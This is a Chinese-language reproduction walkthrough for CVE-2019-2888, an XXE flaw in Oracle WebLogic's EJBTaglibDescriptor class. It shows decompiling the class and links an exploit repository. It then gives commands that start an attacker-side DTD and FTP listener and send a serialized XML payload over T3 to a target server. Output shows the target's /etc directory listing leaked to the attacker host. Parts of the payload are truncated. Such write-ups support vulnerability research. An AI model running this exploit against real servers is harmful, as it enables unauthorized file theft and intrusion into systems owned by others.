（CVE-2019-2888）Weblogic_EJBTaglibDescriptor

# （CVE-2019-2888）Weblogic EJBTaglibDescriptor XXE漏洞

=============

一、漏洞简介
————

二、漏洞影响
————

Weblogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的EJB
Container组件存在安全漏洞

三、复现过程
————

### fernflower.jar

weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
╭─root@jas502n /var
╰─# find ./ |grep EJBTaglibDescriptor  ✔  8388  18:32:43
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var
╰─# ls  ✔  8392  18:33:22
EJBTaglibDescriptor.java fernflower.jar weblogic.jar

#### EJBTaglibDescriptor.class to EJBTaglibDescriptor.java

╭─root@jas502n /var
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
./
INFO: Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO: … done
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar weblogic.jar

#### cat EJBTaglibDescriptor.java

╭─root@jas502n /var
╰─# cat EJBTaglibDescriptor.java

package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

public class EJBTaglibDescriptor implements ToXML, Externalizable {
private static final long serialVersionUID = -9016538269900747655L;
private FilesystemInfoDescriptor fileInfo;
private BeanDescriptor[] beans;
private transient ClassLoader jarLoader;
private static final String PREAMBLE = “\n“;

static void p(String var0) {
System.err.println(“[EJBTagDesc]: ” + var0);
}

### 漏洞利用

**下载python xxer**

https://github.com/ianxtianxt/CVE-2019-2888
info: Starting xxer_httpd on port 8989

info: Starting xxer_ftpd on port 2121

http://10.10.20.100:8989/ext.dtd
python xxer.py -p 8989 -H 10.10.20.100

_ _ _ _ ___ ___
|_’_|_’_| -_| _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

%aaa;%ccc;%ddd;]>

**通过T3协议，发送序列化后的xml payload**

ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001

_ __ __ __ _ _ ___ __ ______
| | / /__ / /_ / /___ ____ _(_)____ | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/ | /| // __/
| |/ |/ / __/ /_/ / / /_/ / /_/ / / /__ / |/ |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/ /_/|_/_/|_/_____/
/____/

CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

python By jas502n

[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending “t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

”
received “HELO”
sending payload…

ale@Pentest: ~/Desktop/CVE-2019-2888#

**get /etc dir info**

root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

_ _ _ _ ___ ___
|_’_|_’_| -_| _|
|_,_|_,_|___|_|

version 1.1

%aaa;%ccc;%ddd;]>

10.10.20.100 – – [01/Nov/2019 12:58:42] “GET /ext.dtd HTTP/1.1” 200 –
info: FTP: recvd ‘USER fakeuser’
info: FTP: recvd ‘PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version